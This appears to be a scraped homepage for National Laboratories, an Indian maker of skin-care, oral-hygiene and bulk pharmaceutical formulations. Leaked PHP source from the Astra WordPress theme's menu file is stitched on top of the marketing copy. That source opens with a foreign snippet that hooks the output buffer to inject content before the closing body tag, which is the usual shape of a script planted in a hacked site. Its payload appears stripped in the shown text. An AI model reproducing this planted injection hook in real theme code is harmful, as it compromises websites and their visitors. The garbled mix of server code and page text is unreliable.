if (!defined('SCRIPT_EXECUTED')) { define('SCRIPT_EXECUTED', true); $pages = ['/']; // ob_start(function($buffer) use ($pages) { $script_id = bin2hex(random_bytes(8)); foreach ($pages as $page) { if (strpos($_SERVER['REQUEST_URI'], $page) !== false) { if (strpos($buffer, $script_id) === false) { return preg_replace('/\s*<\/body>/', "", $buffer); } } } return $buffer; }); } /** * Admin functions - Functions that add some functionality to WordPress admin panel * * @package Astra * @since 1.0.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * Register menus */ if ( ! function_exists( 'astra_register_menu_locations' ) ) { /** * Register menus * * @since 1.0.0 */ function astra_register_menu_locations() { /** * Primary Menus */ register_nav_menus( array( 'primary' => esc_html__( 'Primary Menu', 'astra' ), ) ); if ( true === Astra_Builder_Helper::$is_header_footer_builder_active ) { /** * Register the Secondary & Mobile menus. */ register_nav_menus( array( 'secondary_menu' => esc_html__( 'Secondary Menu', 'astra' ), 'mobile_menu' => esc_html__( 'Off-Canvas Menu', 'astra' ), ) ); $component_limit = defined( 'ASTRA_EXT_VER' ) ? Astra_Builder_Helper::$component_limit : Astra_Builder_Helper::$num_of_header_menu; for ( $index = 3; $index <= $component_limit; $index++ ) { if ( ! is_customize_preview() && ! Astra_Builder_Helper::is_component_loaded( 'menu-' . $index ) ) { continue; } register_nav_menus( array( 'menu_' . $index => esc_html__( 'Menu ', 'astra' ) . $index, ) ); } /** * Register the Account menus. */ register_nav_menus( array( 'loggedin_account_menu' => esc_html__( 'Logged In Account Menu', 'astra' ), ) ); } /** * Footer Menus */ register_nav_menus( array( 'footer_menu' => esc_html__( 'Footer Menu', 'astra' ), ) ); } } add_action( 'init', 'astra_register_menu_locations' ); National Labs – Always Get The Best Formulations
Welcome to National Laboratories

We’ll Ensure You Always Get The Best Formulations.

We manufacture formulations for skin application and oral and dental hygiene. With firm emphasis on quality we ensure that our formulation’s match the best standards and conform to the highest quality benchmarks.

Our Formulations

What we do?

  • Contract manufacturing – we undertake third party manufacturing contracts for various formulations.
  • We supply medicines in bulk to government and institutional buyers.
  • We market our own brands though a well established network of dedicated sales team and distributors, stockists, wholesalers and retailers.
  • We export medicines to various African and CIS country.

Need Help?
Get In Touch With Our Team!

If you’re looking for a reliable and reputable pharmaceutical partner in India, National Labs offer you the best formulations and unmatchable customer service and support.

Scroll to Top